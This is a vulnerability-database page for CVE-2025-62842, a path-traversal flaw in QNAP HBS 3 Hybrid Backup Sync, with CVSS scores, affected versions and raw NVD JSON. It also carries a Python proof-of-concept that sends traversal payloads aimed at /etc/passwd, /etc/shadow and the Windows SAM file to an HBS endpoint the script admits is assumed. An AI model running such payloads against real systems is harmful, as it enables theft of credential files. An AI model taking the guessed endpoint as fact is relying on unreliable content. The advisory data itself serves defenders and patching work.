Security Vulnerability Report
CVE-2025-62842 CVSS 7.8 HIGH

CVE-2025-62842

Published: 2026-01-02 16:17:01
Last Modified: 2026-02-05 19:03:30

Description

An external control of file name or path vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If an attacker gains local network access, they can then exploit the vulnerability to read or modify files or directories. We have already fixed the vulnerability in the following version: HBS 3 Hybrid Backup Sync 26.2.0.938 and later.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:* - VULNERABLE
QNAP HBS 3 Hybrid Backup Sync < 26.2.0.938

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-62842 PoC - QNAP HBS 3 Path Traversal Note: This is a conceptual PoC for educational purposes only. Use responsibly and only on systems you have permission to test. """ import requests import os TARGET_IP = "<target_ip>" HBS_PORT = 8080 # Default HBS port def exploit_path_traversal(): """Attempt to read arbitrary files via path traversal""" # Path traversal payloads payloads = [ "../../../../etc/passwd", "..\\..\\..\\..\\windows\\system32\\config\\sam", "../../../../../../etc/shadow" ] # Target endpoint (assumed based on HBS 3 API structure) base_url = f"http://{TARGET_IP}:{HBS_PORT}/api/v1/file/read" for payload in payloads: try: params = { 'path': payload, 'filename': payload.split('/')[-1] if '/' in payload else payload.split('\\')[-1] } print(f"[*] Testing payload: {payload}") response = requests.get(base_url, params=params, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[!] Potential vulnerability confirmed!") print(f"[+] Response length: {len(response.content)} bytes") print(f"[+] Sample content: {response.content[:200]}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("CVE-2025-62842 Path Traversal PoC") print("Target: QNAP HBS 3 Hybrid Backup Sync") exploit_path_traversal()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62842", "sourceIdentifier": "[email protected]", "published": "2026-01-02T16:17:00.710", "lastModified": "2026-02-05T19:03:30.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An external control of file name or path vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If an attacker gains local network access, they can then exploit the vulnerability to read or modify files or directories.\n\nWe have already fixed the vulnerability in the following version:\nHBS 3 Hybrid Backup Sync 26.2.0.938 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2.0.938", "matchCriteriaId": "EBAF4E08-08BE-4F0C-ABA3-B0F73AB66E76"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-46", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}